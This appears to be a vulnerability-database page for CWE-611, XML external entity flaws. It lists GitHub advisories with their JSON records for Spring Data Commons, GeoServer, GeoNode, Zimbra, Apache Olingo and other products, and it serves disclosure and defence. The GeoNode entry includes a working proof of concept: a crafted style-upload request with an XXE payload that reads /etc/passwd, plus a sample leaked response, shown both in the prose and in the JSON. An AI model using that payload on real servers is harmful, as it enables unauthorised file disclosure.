CWE-611
AllowedImproper Restriction of XML External Entity Reference
Abstraction: Base · Status: Draft
The product processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output.
1694 vulnerabilities reference this CWE, most recent first.
GHSA-M929-7FR6-CVJG
Vulnerability from github – Published: 2018-10-17 17:23 – Updated: 2022-04-27 13:58Spring Data Commons, versions 1.13 prior to 1.13.12 and 2.0 prior to 2.0.7, used in combination with XMLBeam 1.4.14 or earlier versions, contains a property binder vulnerability caused by improper restriction of XML external entity references as underlying library XMLBeam does not restrict external reference expansion. An unauthenticated remote malicious user can supply specially crafted request parameters against Spring Data's projection-based request payload binding to access arbitrary files on the system.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.springframework.data:spring-data-commons"
},
"ranges": [
{
"events": [
{
"introduced": "1.13.0"
},
{
"fixed": "1.13.12"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.springframework.data:spring-data-commons"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0"
},
{
"fixed": "2.0.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2018-1259"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": true,
"github_reviewed_at": "2020-06-16T21:45:35Z",
"nvd_published_at": "2018-05-11T20:29:00Z",
"severity": "HIGH"
},
"details": "Spring Data Commons, versions 1.13 prior to 1.13.12 and 2.0 prior to 2.0.7, used in combination with XMLBeam 1.4.14 or earlier versions, contains a property binder vulnerability caused by improper restriction of XML external entity references as underlying library XMLBeam does not restrict external reference expansion. An unauthenticated remote malicious user can supply specially crafted request parameters against Spring Data\u0027s projection-based request payload binding to access arbitrary files on the system.",
"id": "GHSA-m929-7fr6-cvjg",
"modified": "2022-04-27T13:58:00Z",
"published": "2018-10-17T17:23:36Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1259"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2018:1809"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2018:3768"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-m929-7fr6-cvjg"
},
{
"type": "WEB",
"url": "https://pivotal.io/security/cve-2018-1259"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Spring Data Commons, used in combination with XMLBeam, contains a property binder vulnerability caused by improper restriction of XML external entity references"
}
GHSA-M9HM-R4RP-M682
Vulnerability from github – Published: 2022-05-24 16:50 – Updated: 2024-04-04 01:20Jeesite 1.2.7 is affected by: XML External Entity (XXE). The impact is: sensitive information disclosure. The component is: convertToModel() function in src/main/java/com.thinkgem.jeesite/modules/act/service/ActProcessService.java. The attack vector is: network connectivity,authenticated,must upload a specially crafted xml file. The fixed version is: 4.0 and later.
{
"affected": [],
"aliases": [
"CVE-2019-1010202"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-07-23T14:15:00Z",
"severity": "MODERATE"
},
"details": "Jeesite 1.2.7 is affected by: XML External Entity (XXE). The impact is: sensitive information disclosure. The component is: convertToModel() function in src/main/java/com.thinkgem.jeesite/modules/act/service/ActProcessService.java. The attack vector is: network connectivity,authenticated,must upload a specially crafted xml file. The fixed version is: 4.0 and later.",
"id": "GHSA-m9hm-r4rp-m682",
"modified": "2024-04-04T01:20:30Z",
"published": "2022-05-24T16:50:55Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010202"
},
{
"type": "WEB",
"url": "https://github.com/thinkgem/jeesite/blob/master/src/main/java/com/thinkgem/jeesite/modules/act/service/ActProcessService.java"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-MC43-4FQR-C965
Vulnerability from github – Published: 2025-06-10 14:13 – Updated: 2025-06-10 15:35Summary
An improper URI validation vulnerability exists that enables an unauthorized attacker to perform XML External Entities (XEE) attack, then send GET request to any HTTP server. Attacker can abuse this to scan internal networks and gain information about them then exploit further. Moreover, attacker can read limited .xsd file on system.
Details
By default, GeoServer use PreventLocalEntityResolver class from GeoTools to filter out malicious URIs in XML entities before resolving them. The URI must match the regex (?i)(jar:file|http|vfs)[^?#;]*\\.xsd. But the regex leaves a chance for attackers to request to any HTTP server or limited file.
Impact
An unauthenticated attacker can:
1. Scan internal network to gain insight about it and exploit further.
2. SSRF to endpoint ends with .xsd.
3. Read limited .xsd file on system.
Mitigation
- Define the system property
ENTITY_RESOLUTION_ALLOWLISTto limit the supported external schema locaitons. - The built-in allow list covers the locations required for the operation of OGC web services:
www.w3.org,schemas.opengis.net,www.opengis.net,inspire.ec.europa.eu/schemas. - The user guide provides details on how to add additional locations (this is required for app-schema plugin where a schema is supplied to define an output format).
Resolution
- GeoServer 2.25.0 and greater default to the use of
ENTITY_RESOLUTION_ALLOWLISTand does not require you to provide a system property. - The use of
ENTITY_RESOLUTION_ALLOWLISTis still supported if you require additional schema locations to be supported beyond the built-in allow list. - GeoServer 2.25.1 change
ENTITY_RESOLUTION_ALLOWLISTno longer supports regular expressions
References
- External Entities Resolution (GeoServer User Guide)
Credits
- Le Mau Anh Phong from VNG Security Response Center & VNUHCM - University of Information Technology
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.geoserver.web:gs-web-app"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.25.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.geoserver.main:gs-main"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.25.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-34711"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-200",
"CWE-611",
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2025-06-10T14:13:44Z",
"nvd_published_at": "2025-06-10T15:15:22Z",
"severity": "CRITICAL"
},
"details": "### Summary\nAn improper URI validation vulnerability exists that enables an unauthorized attacker to perform XML External Entities (XEE) attack, then send GET request to any HTTP server. Attacker can abuse this to scan internal networks and gain information about them then exploit further. Moreover, attacker can read limited `.xsd` file on system.\n\n### Details\nBy default, GeoServer use `PreventLocalEntityResolver` class from GeoTools to filter out malicious URIs in XML entities before resolving them. The URI must match the regex `(?i)(jar:file|http|vfs)[^?#;]*\\\\.xsd`. But the regex leaves a chance for attackers to request to any HTTP server or limited file.\n\n### Impact\n\nAn unauthenticated attacker can:\n1. Scan internal network to gain insight about it and exploit further.\n2. SSRF to endpoint ends with `.xsd`.\n3. Read limited `.xsd` file on system.\n\n### Mitigation\n\n1. Define the system property ``ENTITY_RESOLUTION_ALLOWLIST`` to limit the supported external schema locaitons.\n2. The built-in allow list covers the locations required for the operation of OGC web services: ``www.w3.org``,``schemas.opengis.net``,``www.opengis.net``,``inspire.ec.europa.eu/schemas``.\n3. The [user guide](https://docs.geoserver.org/latest/en/user/production/config.html#production-config-external-entities) provides details on how to add additional locations (this is required for app-schema plugin where a schema is supplied to define an output format).\n\n### Resolution \n\n1. GeoServer 2.25.0 and greater default to the use of ``ENTITY_RESOLUTION_ALLOWLIST`` and does not require you to provide a system property.\n2. The use of ``ENTITY_RESOLUTION_ALLOWLIST`` is still supported if you require additional schema locations to be supported beyond the built-in allow list.\n3. GeoServer 2.25.1 change ``ENTITY_RESOLUTION_ALLOWLIST `` no longer supports regular expressions\n\n### References\n\n* [External Entities Resolution](https://docs.geoserver.org/latest/en/user/production/config.html#production-config-external-entities) (GeoServer User Guide)\n\n### Credits\n* Le Mau Anh Phong from VNG Security Response Center \u0026 VNUHCM - University of Information Technology",
"id": "GHSA-mc43-4fqr-c965",
"modified": "2025-06-10T15:35:23Z",
"published": "2025-06-10T14:13:44Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/geoserver/geoserver/security/advisories/GHSA-mc43-4fqr-c965"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34711"
},
{
"type": "WEB",
"url": "https://docs.geoserver.org/latest/en/user/production/config.html#production-config-external-entities"
},
{
"type": "PACKAGE",
"url": "https://github.com/geoserver/geoserver"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "GeoServer has improper ENTITY_RESOLUTION_ALLOWLIST URI validation in XML Processing (SSRF)"
}
GHSA-MC6F-XMMW-R6PV
Vulnerability from github – Published: 2026-03-20 15:31 – Updated: 2026-03-23 15:30An issue was discovered in Zimbra Collaboration (ZCS) 10.0 and 10.1. An XML External Entity (XXE) vulnerability exists in the Zimbra Exchange Web Services (EWS) SOAP interface due to improper handling of XML input. An authenticated attacker can submit crafted XML data that is processed by an XML parser with external entity resolution enabled. Successful exploitation may allow disclosure of sensitive local files from the server.
{
"affected": [],
"aliases": [
"CVE-2026-33371"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-20T14:16:16Z",
"severity": "MODERATE"
},
"details": "An issue was discovered in Zimbra Collaboration (ZCS) 10.0 and 10.1. An XML External Entity (XXE) vulnerability exists in the Zimbra Exchange Web Services (EWS) SOAP interface due to improper handling of XML input. An authenticated attacker can submit crafted XML data that is processed by an XML parser with external entity resolution enabled. Successful exploitation may allow disclosure of sensitive local files from the server.",
"id": "GHSA-mc6f-xmmw-r6pv",
"modified": "2026-03-23T15:30:33Z",
"published": "2026-03-20T15:31:14Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33371"
},
{
"type": "WEB",
"url": "https://wiki.zimbra.com/wiki/Security_Center"
},
{
"type": "WEB",
"url": "https://wiki.zimbra.com/wiki/Zimbra_Releases/10.1.16#Security_Fixes"
},
{
"type": "WEB",
"url": "https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy"
},
{
"type": "WEB",
"url": "https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-MCMC-C59M-PQQ8
Vulnerability from github – Published: 2024-08-30 18:50 – Updated: 2024-11-18 16:27Summary
GeoNode is vulnerable to an XML External Entity (XXE) injection in the style upload functionality of GeoServer leading to Arbitrary File Read.
Details
GeoNode's GeoServer has the ability to upload new styles for datasets through the dataset_style_upload view.
# https://github.dev/GeoNode/geonode/blob/99b0557da5c7db23c72ad39e466b88fe43edf82d/geonode/geoserver/views.py#L158-L159
@login_required
def dataset_style_upload(request, layername):
def respond(*args, **kw):
kw['content_type'] = 'text/html'
return json_response(*args, **kw)
...
sld = request.FILES['sld'].read() # 1
sld_name = None
try:
# Check SLD is valid
...
sld_name = extract_name_from_sld(gs_catalog, sld, sld_file=request.FILES['sld']) # 2
except Exception as e:
respond(errors=f"The uploaded SLD file is not valid XML: {e}")
name = data.get('name') or sld_name
set_dataset_style(layer, data.get('title') or name, sld)
return respond(
body={
'success': True,
'style': data.get('title') or name, # 3
'updated': data['update']})
dataset_style_upload gets a user-provided file (1), pass it to extract_name_from_sld to extract an element from it (2) and return the former in the response (3).
# https://github.dev/GeoNode/geonode/blob/99b0557da5c7db23c72ad39e466b88fe43edf82d/geonode/geoserver/helpers.py#L233-L234
def extract_name_from_sld(gs_catalog, sld, sld_file=None):
try:
if sld:
if isfile(sld):
with open(sld, "rb") as sld_file:
sld = sld_file.read() # 1
if isinstance(sld, str):
sld = sld.encode('utf-8')
dom = etree.XML(sld) # 2
...
named_dataset = dom.findall(
"{http://www.opengis.net/sld}NamedLayer")
el = None
if named_dataset and len(named_dataset) > 0:
user_style = named_dataset[0].findall("{http://www.opengis.net/sld}UserStyle")
if user_style and len(user_style) > 0:
el = user_style[0].findall("{http://www.opengis.net/sld}Name") # 3
...
return el[0].text # 4
extract_name_from_sld uses sld (which is a path to the provided file), reads it (1) and parses it with etree.XML in 2. Since the former uses a default XMLParser, the parsing gets done with the resolve_entities flag set to True. Therefore, dom handles the parsed XML containing the resolved entity (2), gets NamedLayer.UserStyle.Name in 3 and returns the resolved content in 4.
PoC
- Create a guest/non-privileged account and log in.
- Upload a dataset through
/catalogue/#/upload/datasetwhose name we will be referencing as<DATASET_NAME>. - Send the following request that will try to upload a new style for the dataset. The response will be returning the resolved entity with the contents of
/etc/passwd:
POST /gs/geonode:<DATASET_NAME>/style/upload HTTP/1.1
Host: localhost
Cookie: django_language=en-us; csrftoken=<CSRF-TOKEN>; sessionid=<SESSION-COOKIE>
X-Csrftoken: <CSRF-TOKEN>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfoo
Content-Length: 485
------WebKitFormBoundaryfoo
Content-Disposition: form-data; name="layerid"
1
------WebKitFormBoundaryfoo
Content-Disposition: form-data; name="sld"; filename="foo.sld"
Content-Type: application/octet-stream
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE foo [ <!ENTITY ent SYSTEM "/etc/passwd" > ]>
<foo xmlns="http://www.opengis.net/sld">
<NamedLayer>
<UserStyle>
<Name>&ent;</Name>
</UserStyle>
</NamedLayer>
</foo>
------WebKitFormBoundaryfoo--
Sample response:
HTTP/1.1 200 OK
Server: nginx/1.23.2
...
{"success": true, "style": "root:x:0:0:root:/root:/bin/bash...", "updated": false}
Impact
This issue may lead to authenticated Arbitrary File Read.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "GeoNode"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.0.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-26043"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": true,
"github_reviewed_at": "2024-08-30T18:50:00Z",
"nvd_published_at": "2023-02-27T21:15:12Z",
"severity": "HIGH"
},
"details": "### Summary\nGeoNode is vulnerable to an XML External Entity (XXE) injection in the style upload functionality of GeoServer leading to Arbitrary File Read.\n\n### Details\nGeoNode\u0027s GeoServer has the ability to upload new styles for datasets through the [`dataset_style_upload` view](https://github.com/GeoNode/geonode/blob/99b0557da5c7db23c72ad39e466b88fe43edf82d/geonode/geoserver/urls.py#L70-L72).\n\n```py\n# https://github.dev/GeoNode/geonode/blob/99b0557da5c7db23c72ad39e466b88fe43edf82d/geonode/geoserver/views.py#L158-L159\n@login_required\ndef dataset_style_upload(request, layername):\n def respond(*args, **kw):\n kw[\u0027content_type\u0027] = \u0027text/html\u0027\n return json_response(*args, **kw)\n ...\n sld = request.FILES[\u0027sld\u0027].read() # 1\n sld_name = None\n try:\n # Check SLD is valid\n ...\n sld_name = extract_name_from_sld(gs_catalog, sld, sld_file=request.FILES[\u0027sld\u0027]) # 2\n except Exception as e:\n respond(errors=f\"The uploaded SLD file is not valid XML: {e}\")\n name = data.get(\u0027name\u0027) or sld_name\n set_dataset_style(layer, data.get(\u0027title\u0027) or name, sld)\n return respond(\n body={\n \u0027success\u0027: True,\n \u0027style\u0027: data.get(\u0027title\u0027) or name, # 3\n \u0027updated\u0027: data[\u0027update\u0027]})\n```\n\n`dataset_style_upload` gets a user-provided file (`1`), pass it to `extract_name_from_sld` to extract an element from it (`2`) and return the former in the response (`3`).\n\n```py\n# https://github.dev/GeoNode/geonode/blob/99b0557da5c7db23c72ad39e466b88fe43edf82d/geonode/geoserver/helpers.py#L233-L234\ndef extract_name_from_sld(gs_catalog, sld, sld_file=None):\n try:\n if sld:\n if isfile(sld):\n with open(sld, \"rb\") as sld_file:\n sld = sld_file.read() # 1\n if isinstance(sld, str):\n sld = sld.encode(\u0027utf-8\u0027)\n dom = etree.XML(sld) # 2\n ...\n named_dataset = dom.findall(\n \"{http://www.opengis.net/sld}NamedLayer\")\n el = None\n if named_dataset and len(named_dataset) \u003e 0:\n user_style = named_dataset[0].findall(\"{http://www.opengis.net/sld}UserStyle\")\n if user_style and len(user_style) \u003e 0:\n el = user_style[0].findall(\"{http://www.opengis.net/sld}Name\") # 3\n ...\n return el[0].text # 4\n```\n\n`extract_name_from_sld` uses `sld` (which is a path to the provided file), reads it (`1`) and parses it with [`etree.XML`](https://github.com/python/cpython/blob/22d91c16bb03c3d87f53b5fee10325b876262a78/Lib/xml/etree/ElementTree.py#L1312) in `2`. Since the former uses a [default XMLParser](https://github.com/python/cpython/blob/22d91c16bb03c3d87f53b5fee10325b876262a78/Lib/xml/etree/ElementTree.py#L1323-L1324), the parsing gets done with the [`resolve_entities` flag set to `True`](https://lxml.de/api/lxml.etree.XMLParser-class.html#:~:text=resolve_entities%3DTrue). Therefore, `dom` handles the parsed XML containing the resolved entity (`2`), gets `NamedLayer.UserStyle.Name` in `3` and returns the resolved content in `4`.\n\n### PoC\n1. Create a guest/non-privileged account and log in.\n1. Upload a dataset through `/catalogue/#/upload/dataset` whose name we will be referencing as `\u003cDATASET_NAME\u003e`.\n1. Send the following request that will try to upload a new style for the dataset. The response will be returning the resolved entity with the contents of `/etc/passwd`:\n\n```\nPOST /gs/geonode:\u003cDATASET_NAME\u003e/style/upload HTTP/1.1\nHost: localhost\nCookie: django_language=en-us; csrftoken=\u003cCSRF-TOKEN\u003e; sessionid=\u003cSESSION-COOKIE\u003e\nX-Csrftoken: \u003cCSRF-TOKEN\u003e\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryfoo\nContent-Length: 485\n------WebKitFormBoundaryfoo\nContent-Disposition: form-data; name=\"layerid\"\n1\n------WebKitFormBoundaryfoo\nContent-Disposition: form-data; name=\"sld\"; filename=\"foo.sld\"\nContent-Type: application/octet-stream\n\u003c?xml version=\"1.0\" standalone=\"yes\"?\u003e\n\u003c!DOCTYPE foo [ \u003c!ENTITY ent SYSTEM \"/etc/passwd\" \u003e ]\u003e\n\u003cfoo xmlns=\"http://www.opengis.net/sld\"\u003e\n \u003cNamedLayer\u003e\n \u003cUserStyle\u003e\n \t\u003cName\u003e\u0026ent;\u003c/Name\u003e\n \u003c/UserStyle\u003e\n \u003c/NamedLayer\u003e\n\u003c/foo\u003e\n------WebKitFormBoundaryfoo--\n```\n\nSample response:\n\n```\nHTTP/1.1 200 OK\nServer: nginx/1.23.2\n...\n{\"success\": true, \"style\": \"root:x:0:0:root:/root:/bin/bash...\", \"updated\": false}\n```\n\n\n### Impact\nThis issue may lead to authenticated `Arbitrary File Read`.\n",
"id": "GHSA-mcmc-c59m-pqq8",
"modified": "2024-11-18T16:27:08Z",
"published": "2024-08-30T18:50:00Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/GeoNode/geonode/security/advisories/GHSA-mcmc-c59m-pqq8"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26043"
},
{
"type": "WEB",
"url": "https://github.com/GeoNode/geonode/commit/2fdfe919f299b21f1609bf898f9dcfde58770ac0"
},
{
"type": "PACKAGE",
"url": "https://github.com/GeoNode/geonode"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/geonode/PYSEC-2023-15.yaml"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "GeoServer style upload functionality vulnerable to XML External Entity (XXE) injection"
}
GHSA-MF3M-FQ5F-P4Q9
Vulnerability from github – Published: 2022-05-14 03:31 – Updated: 2022-05-14 03:31I Librarian I-librarian version 4.8 and earlier contains a XML External Entity (XXE) vulnerability in line 154 of importmetadata.php(simplexml_load_string) that can result in an attacker reading the contents of a file and SSRF. This attack appear to be exploitable via posting xml in the Parameter form_import_textarea.
{
"affected": [],
"aliases": [
"CVE-2018-1000124"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-03-13T21:29:00Z",
"severity": "CRITICAL"
},
"details": "I Librarian I-librarian version 4.8 and earlier contains a XML External Entity (XXE) vulnerability in line 154 of importmetadata.php(simplexml_load_string) that can result in an attacker reading the contents of a file and SSRF. This attack appear to be exploitable via posting xml in the Parameter form_import_textarea.",
"id": "GHSA-mf3m-fq5f-p4q9",
"modified": "2022-05-14T03:31:37Z",
"published": "2022-05-14T03:31:37Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000124"
},
{
"type": "WEB",
"url": "https://github.com/mkucej/i-librarian/issues/116"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-MF73-PH8W-GGJG
Vulnerability from github – Published: 2022-05-14 02:57 – Updated: 2022-05-14 02:57OCS Inventory 2.4.1 lacks a proper XML parsing configuration, allowing the use of external entities. This issue can be exploited by an attacker sending a crafted HTTP request in order to exfiltrate information or cause a Denial of Service.
{
"affected": [],
"aliases": [
"CVE-2018-14473"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-08-04T01:29:00Z",
"severity": "CRITICAL"
},
"details": "OCS Inventory 2.4.1 lacks a proper XML parsing configuration, allowing the use of external entities. This issue can be exploited by an attacker sending a crafted HTTP request in order to exfiltrate information or cause a Denial of Service.",
"id": "GHSA-mf73-ph8w-ggjg",
"modified": "2022-05-14T02:57:58Z",
"published": "2022-05-14T02:57:58Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-14473"
},
{
"type": "WEB",
"url": "https://www.tarlogic.com/en/blog/vulnerabilities-in-ocs-inventory-2-4-1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-MFH5-WQQV-JP8Q
Vulnerability from github – Published: 2022-05-14 03:12 – Updated: 2022-05-14 03:12IBM Rhapsody DM 5.0 through 5.0.2 and 6.0 through 6.0.5 is vulnerable to a XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 140091.
{
"affected": [],
"aliases": [
"CVE-2018-1456"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-06-06T17:29:00Z",
"severity": "HIGH"
},
"details": "IBM Rhapsody DM 5.0 through 5.0.2 and 6.0 through 6.0.5 is vulnerable to a XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 140091.",
"id": "GHSA-mfh5-wqqv-jp8q",
"modified": "2022-05-14T03:12:14Z",
"published": "2022-05-14T03:12:14Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1456"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/140091"
},
{
"type": "WEB",
"url": "http://www.ibm.com/support/docview.wss?uid=swg22016795"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-MGH8-HCWJ-H57V
Vulnerability from github – Published: 2020-02-04 22:37 – Updated: 2021-08-19 16:53The XML content type entity deserializer in Apache Olingo versions 4.0.0 to 4.6.0 is not configured to deny the resolution of external entities. Request with content type "application/xml", which trigger the deserialization of entities, can be used to trigger XXE attacks.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.6.0"
},
"package": {
"ecosystem": "Maven",
"name": "org.apache.olingo:odata-client-core"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0"
},
{
"fixed": "4.7.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.6.0"
},
"package": {
"ecosystem": "Maven",
"name": "org.apache.olingo:odata-server-core"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0"
},
{
"fixed": "4.7.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2019-17554"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": true,
"github_reviewed_at": "2020-02-04T22:29:36Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "The XML content type entity deserializer in Apache Olingo versions 4.0.0 to 4.6.0 is not configured to deny the resolution of external entities. Request with content type \"application/xml\", which trigger the deserialization of entities, can be used to trigger XXE attacks.",
"id": "GHSA-mgh8-hcwj-h57v",
"modified": "2021-08-19T16:53:27Z",
"published": "2020-02-04T22:37:43Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-17554"
},
{
"type": "WEB",
"url": "https://github.com/apache/olingo-odata4/commit/5948974ad28271818e2afe747c71cde56a7f2c63"
},
{
"type": "WEB",
"url": "https://github.com/apache/olingo-odata4/commit/c3f982db3d97e395d313ae8f231202bb2139882c"
},
{
"type": "WEB",
"url": "https://issues.apache.org/jira/browse/OLINGO-1409"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r6d03e45b81eab03580cf7f8bb51cb3e9a1b10a2cc0c6a2d3cc92ed0c@%3Cannounce.apache.org%3E"
},
{
"type": "WEB",
"url": "https://mail-archives.apache.org/mod_mbox/olingo-user/201912.mbox/%3CCAGSZ4d7Ty%3DL-n_iAzT6vcQp65BY29XZDS5tMoM8MdDrb1moM7A%40mail.gmail.com%3E"
},
{
"type": "WEB",
"url": "https://seclists.org/bugtraq/2019/Dec/11"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/155619/Apache-Olingo-OData-4.6.x-XML-Injection.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Improper Restriction of XML External Entity Reference in Apache Olingo"
}
GHSA-MGJG-HM5J-P2WQ
Vulnerability from github – Published: 2023-03-30 18:30 – Updated: 2023-04-05 15:30A blind XML External Entity (XXE) vulnerability exists in the Add UCS Device functionality of ManageEngine OpManager 12.6.168. A specially crafted XML file can lead to SSRF. An attacker can serve a malicious XML payload to trigger this vulnerability.
{
"affected": [],
"aliases": [
"CVE-2022-43473"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-03-30T17:15:00Z",
"severity": "MODERATE"
},
"details": "A blind XML External Entity (XXE) vulnerability exists in the Add UCS Device functionality of ManageEngine OpManager 12.6.168. A specially crafted XML file can lead to SSRF. An attacker can serve a malicious XML payload to trigger this vulnerability.",
"id": "GHSA-mgjg-hm5j-p2wq",
"modified": "2023-04-05T15:30:24Z",
"published": "2023-03-30T18:30:30Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-43473"
},
{
"type": "WEB",
"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2022-1685"
},
{
"type": "WEB",
"url": "https://www.manageengine.com/itom/advisory/cve-2022-43473.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
Mitigation
Many XML parsers and validators can be configured to disable external entity expansion.
CAPEC-221: Data Serialization External Entities Blowup
This attack takes advantage of the entity replacement property of certain data serialization languages (e.g., XML, YAML, etc.) where the value of the replacement is a URI. A well-crafted file could have the entity refer to a URI that consumes a large amount of resources to create a denial of service condition. This can cause the system to either freeze, crash, or execute arbitrary code depending on the URI.